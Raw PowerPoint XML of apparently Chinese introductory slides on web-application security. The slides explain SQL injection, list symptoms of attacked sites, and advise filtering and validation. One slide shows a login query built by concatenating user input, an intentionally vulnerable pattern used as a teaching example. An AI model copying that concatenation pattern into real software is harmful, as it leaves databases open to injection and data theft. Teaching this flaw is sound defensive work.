              <a:t>（数据库）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>8.网站被攻击打不开会打开极为缓慢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（流量）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>9.网站网页打开自动跳转到其它网站页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（网页）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9164955" y="781685"/>
            <a:ext cx="3028950" cy="3000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84504E-E42A-5268-3DD3-EBE5A07E7713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095246" y="339598"/>
            <a:ext cx="9187196" cy="2830322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D7C75E-00F6-5CC9-8F96-D01AE0839187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095246" y="3304778"/>
            <a:ext cx="9090860" cy="2515972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{461444BA-46CE-B7BF-4FC8-B4552C3ABEC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3852672" y="402336"/>
            <a:ext cx="585216" cy="3413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62A9D6D-1669-2E7A-442C-12FF366B3754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4096512" y="3304778"/>
            <a:ext cx="585216" cy="3413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963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E02328-4575-E1C8-6E47-D6BAFBBC6331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084832" y="1694688"/>
            <a:ext cx="9708812" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>user=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>admin&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=123456</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> ”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>+password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B67E0014-9DEB-3C13-17A0-D2C5D5401710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1756968" y="317526"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D268A3E-2C70-B813-3434-E1699EE6222B}"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F4EC244-95EA-CAC9-20E0-9820A07926AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="2233304"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参数如何处理</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25418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30479" y="567086"/>
            <a:ext cx="10651809" cy="5889600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1513128" y="-126584"/>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9593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基础动态页面</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370580" y="1494790"/>
            <a:ext cx="685800" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEC8DA4D-F1DB-85B5-081E-A8DDE316D28A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513128" y="2858993"/>
            <a:ext cx="3648807" cy="4953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E5FF6DD-7440-A44D-C597-9E74A46887CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6260690" y="2920181"/>
            <a:ext cx="4041058" cy="4341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30479" y="567086"/>
            <a:ext cx="10651809" cy="5889600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1513128" y="-126584"/>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9593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基础动态页面</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370580" y="1494790"/>
            <a:ext cx="685800" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5FF6DD-7440-A44D-C597-9E74A46887CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6260690" y="2920181"/>
            <a:ext cx="4041058" cy="4341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142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30479" y="567086"/>
            <a:ext cx="10651809" cy="5889600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1513128" y="-126584"/>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9593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基础动态页面</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370580" y="1494790"/>
            <a:ext cx="685800" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228416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16405" y="2403475"/>
            <a:ext cx="10475595" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>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860" y="1196340"/>
            <a:ext cx="9853295" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1734185" y="2403475"/>
            <a:ext cx="10457815" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>应用基础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1300" y="911225"/>
            <a:ext cx="11708765" cy="4852670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="椭圆 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="4432300"/>
            <a:ext cx="2291080" cy="121221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316605" y="4323080"/>
            <a:ext cx="757555" cy="121221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16405" y="2403475"/>
            <a:ext cx="10475595" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>SQL注入攻击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24187" y="319244"/>
            <a:ext cx="7886700" cy="933450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>注入的发生</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB1209B-849B-12CD-24B4-29960430A1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="592171" y="1653572"/>
            <a:ext cx="11160000" cy="3599998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3559748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8417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什么是SQL注入？</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4145280" y="1068705"/>
            <a:ext cx="4780280" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>风险管理很头痛？慧眼帮您识漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据交互用SQL，注入语句来攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>欺骗执行非授权，拖库泄露和提权。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>防护策略需启用，严格过滤和验证。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="3027045"/>
            <a:ext cx="9481185" cy="2489200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>SQL注入是指web应用程序对用户输入数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>合法性没有判断或过滤不严</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，攻击者可以在web应用程序中事先定义好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查询语句结尾添加额外的SQL语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，在管理员不知情的情况下实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>非法操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，以此来欺骗数据库服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行非授权的任意查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，得到相应的数据信息，达到进一步渗透的目的。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p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731703" y="1590040"/>
            <a:ext cx="5214937" cy="2509838"/>
          </a:xfrm>
